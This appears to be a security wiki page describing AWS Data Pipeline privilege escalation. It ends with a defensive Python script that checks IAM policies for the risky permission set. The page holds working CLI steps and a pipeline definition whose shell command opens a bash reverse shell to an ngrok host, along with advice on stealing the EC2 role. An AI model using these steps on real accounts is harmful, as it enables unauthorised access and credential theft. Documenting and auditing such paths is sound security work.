AWS - Datapipeline Privesc


datapipeline

For more information about datapipeline, check:

AWS - DataPipeline, CodePipeline & CodeCommit Enum

iam:PassRole, datapipeline:CreatePipeline, datapipeline:PutPipelineDefinition, datapipeline:ActivatePipeline

Users with these permissions can escalate privileges by creating a Data Pipeline to execute arbitrary commands using the permissions of the assigned role:

```bash
aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string
```

After creating the pipeline, the attacker updates its definition to dictate specific actions or resource creations:

```json
{
  "objects": [
    {
      "id": "CreateDirectory",
      "type": "ShellCommandActivity",
      "command": "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'",
      "runsOn": { "ref": "instance" }
    },
    {
      "id": "Default",
      "scheduleType": "ondemand",
      "failureAndRerunMode": "CASCADE",
      "name": "Default",
      "role": "assumable_datapipeline",
      "resourceRole": "assumable_datapipeline"
    },
    {
      "id": "instance",
      "name": "instance",
      "type": "Ec2Resource",
      "actionOnTaskFailure": "terminate",
      "actionOnResourceFailure": "retryAll",
      "maximumRetries": "1",
      "instanceType": "t2.micro",
      "securityGroups": ["default"],
      "role": "assumable_datapipeline",
      "resourceRole": "assumable_ec2_profile_instance"
    }
  ]
}
```

Note that the role in lines 14, 15 and 27 needs to be a role assumable by datapipeline.amazonaws.com and the role in line 28 needs to be a role assumable by ec2.amazonaws.com with an EC2 instance profile.

Moreover, the EC2 instance will only have access to the role assumable by the EC2 instance (so you can only steal that one).

```bash
aws datapipeline put-pipeline-definition --pipeline-id <pipeline-id> \
    --pipeline-definition file:///pipeline/definition.json
```

The pipeline definition file, crafted by the attacker, includes directives to execute commands or create resources via the AWS API, leveraging the Data Pipeline's role permissions to potentially gain additional privileges.

Potential Impact: Direct privesc to the ec2 service role specified.
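For IAM review, the permission combination named in this section can be checked offline against a principal's identity policies. The Python sketch below is an added example, not part of the original page; the `audit` function, the sample policies and the account ID and role name in them are constructed for illustration. It ignores conditions, `NotAction`, permission boundaries and SCPs.

```python
import fnmatch

# Actions this page lists as sufficient, together, for the escalation.
REQUIRED = ["iam:PassRole", "datapipeline:CreatePipeline",
            "datapipeline:PutPipelineDefinition", "datapipeline:ActivatePipeline"]

def _as_list(value):
    return value if isinstance(value, list) else [value]

def _matches(action, patterns):
    # IAM action names are case-insensitive and accept * and ? wildcards.
    return any(fnmatch.fnmatchcase(action.lower(), p.lower()) for p in patterns)

def audit(policies):
    """Return (risky, passrole_resources) for a principal's identity policies.

    Assumption: Condition, NotAction, permission boundaries and SCPs are not
    evaluated, so True means "review this principal", not "exploitable".
    """
    allowed, denied, passrole_resources = set(), set(), set()
    for policy in policies:
        for stmt in _as_list(policy.get("Statement", [])):
            actions = _as_list(stmt.get("Action", []))
            resources = _as_list(stmt.get("Resource", "*"))
            for req in (r for r in REQUIRED if _matches(r, actions)):
                if stmt.get("Effect") == "Deny" and "*" in resources:
                    denied.add(req)  # only an unscoped Deny is treated as blocking
                elif stmt.get("Effect") == "Allow":
                    allowed.add(req)
                    if req == "iam:PassRole":
                        passrole_resources.update(resources)
    risky = all(a in allowed and a not in denied for a in REQUIRED)
    return risky, sorted(passrole_resources)

# Constructed sample policies (not taken from any real account).
SAMPLE_RISKY = [
    {"Statement": [{"Effect": "Allow", "Action": "datapipeline:*", "Resource": "*"}]},
    {"Statement": {"Effect": "Allow", "Action": ["iam:Pass*"], "Resource": "*"}},
]
SAMPLE_SCOPED = [{"Statement": [
    {"Effect": "Allow", "Resource": "*",
     "Action": ["datapipeline:CreatePipeline", "datapipeline:PutPipelineDefinition"]},
    {"Effect": "Allow", "Action": "iam:PassRole",
     "Resource": "arn:aws:iam::111122223333:role/etl-role"},
]}]

if __name__ == "__main__":
    for name, sample in (("risky", SAMPLE_RISKY), ("scoped", SAMPLE_SCOPED)):
        print(name, audit(sample))
```

A `"*"` in the returned `iam:PassRole` resources means the principal can hand any role to the service; scoping that statement to the specific roles a pipeline needs removes the escalation path even when the datapipeline actions remain.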
